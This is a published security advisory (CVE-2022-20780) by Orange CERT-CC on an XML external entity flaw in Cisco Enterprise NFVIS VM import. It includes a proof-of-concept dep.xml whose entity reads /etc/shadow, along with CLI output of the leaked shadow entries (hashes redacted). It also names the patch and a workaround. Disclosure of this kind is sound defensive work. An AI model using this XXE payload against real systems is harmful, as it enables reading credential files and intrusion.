Skip to content

Cisco Enterprise NFVIS - XML External Entity Injection Vulnerability (CVE-2022-20780)

High
orange-cert-cc published GHSA-hrpq-384f-vrpg May 6, 2022

Package

NFVIS (Cisco)

Affected versions

4.5.1-FC2

Patched versions

4.7.1

Description

Overview

ENCS has the capability to export VMs. Configurations and metadata are compressed with the VM image in a .vmbkp archive when vmExportAction command is requested.
The vmImportAction command is also available, allowing to import .vmbkp archives.

This import is vulnerable to an XXE allowing to leak system datas to the CLI and probably to the VM.

Details

The vmImportAction is waiting to a .vmbkp archive. This archive is a simple .tar.gz.
It has to be composed of several files. One of them being dep.xml.

dep.xml is a XML configuration file describing the vm_lifecycle.

An attacker can add an external entity into this XML file. This external entity will be resolved by the EncsManager.

Proof of Concept

In this example we inject the external entity in a variable field of a vm_group that should be resolved with /etc/shadow file.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<vm_lifecycle xmlns="http://www.cisco.com/nfvis/vm_lifecycle">
  <tenants>
  <tenant>
    <name>admin</name>
      <deployments>
      <deployment>
        <name>ubuntu1</name>
        <vm_group>
          <name>ubuntu1</name>
          ...
          <config_data>
		  ...
            <configuration>
              <dst>user-data</dst>
			  ...
              <variable>
                <name>xxe</name>
                <val>&xxe;</val>
              </variable>
            </configuration>
          </config_data>
        </vm_group>
      </deployment>
      </deployments>
  </tenant>
  </tenants>
  </vm_lifecycle>

It results in /etc/shadow content being displayed in the configuration file.

encs-audit-n# show running-config vm_lifecycle tenants tenant admin deployments deployment ubuntu1 vm_group ubuntu1 config_data configuration variable xxe     
vm_lifecycle tenants tenant admin
 deployments deployment ubuntu1
  vm_group ubuntu1
   config_data configuration user-data
    variable xxe
     val [ "root:$6$TqVe9rHRx8kkXfb$<REDACTED>:18820:0:99999:7:::\nbin:*:18527:0:99999:7:::\ndaemon:*:18527:0:99999:7:::\nadm:*:18527:0:99999:7:::\nlp:*:18527:0:99999:7:::\nsync:*:18527:0:99999:7:::\nshutdown:*:18527:0:99999:7:::\nhalt:*:18527:0:99999:7:::\nmail:*:18527:0:99999:7:::\noperator:*:18527:0:99999:7:::\ngames:*:18527:0:99999:7:::\nftp:*:18527:0:99999:7:::\nnobody:*:18527:0:99999:7:::\nnginx:!!:18820::::::\nsystemd-network:!!:18820::::::\ndbus:!!:18820::::::\npolkitd:!!:18820::::::\nunbound:!!:18820::::::\nrpc:!!:18820:0:99999:7:::\ntss:!!:18820::::::\nqemu:!!:18820::::::\nsaslauth:!!:18820::::::\nopenvswitch:!!:18820::::::\nsshd:!!:18820::::::\ngeoclue:!!:18820::::::\nntp:!!:18820::::::\nchrony:!!:18820::::::\nrpcuser:!!:18820::::::\nnfsnobody:!!:18820::::::\nconsole:!!:18820:0:99999:7:::\ngluster:!!:18820::::::\nradvd:!!:18820::::::\nldap:!!:18820::::::\ndockerroot:!!:18820::::::\ntomcat:!!:18820::::::\npostgres:!!:18820::::::\ntcpdump:!!:18820::::::\npostfix:!!:18820::::::\nbird:!!:18820::::::\nadmin:$6$W56YPo/BPFohgh97$<REDACTED>:18820:0:99999:7:::\n" ]
    !
   !
  !
 !
!

Solution

Security patch

Upgrade to Cisco Enterprise NFVIS v4.7.1

Workaround

We recommand to disable external entity resolution in XML parser.

References

https://nvd.nist.gov/vuln/detail/CVE-2022-20780
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9

Credits

Orange CERT-CC
Cyrille CHATRAS at Orange group
Loic RESTOUX at Orange group
Pierre DENOUEL at Orange group

Timeline

Date reported: September 16, 2021
Date fixed: May 4, 2022

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVE ID

CVE-2022-20780

Weaknesses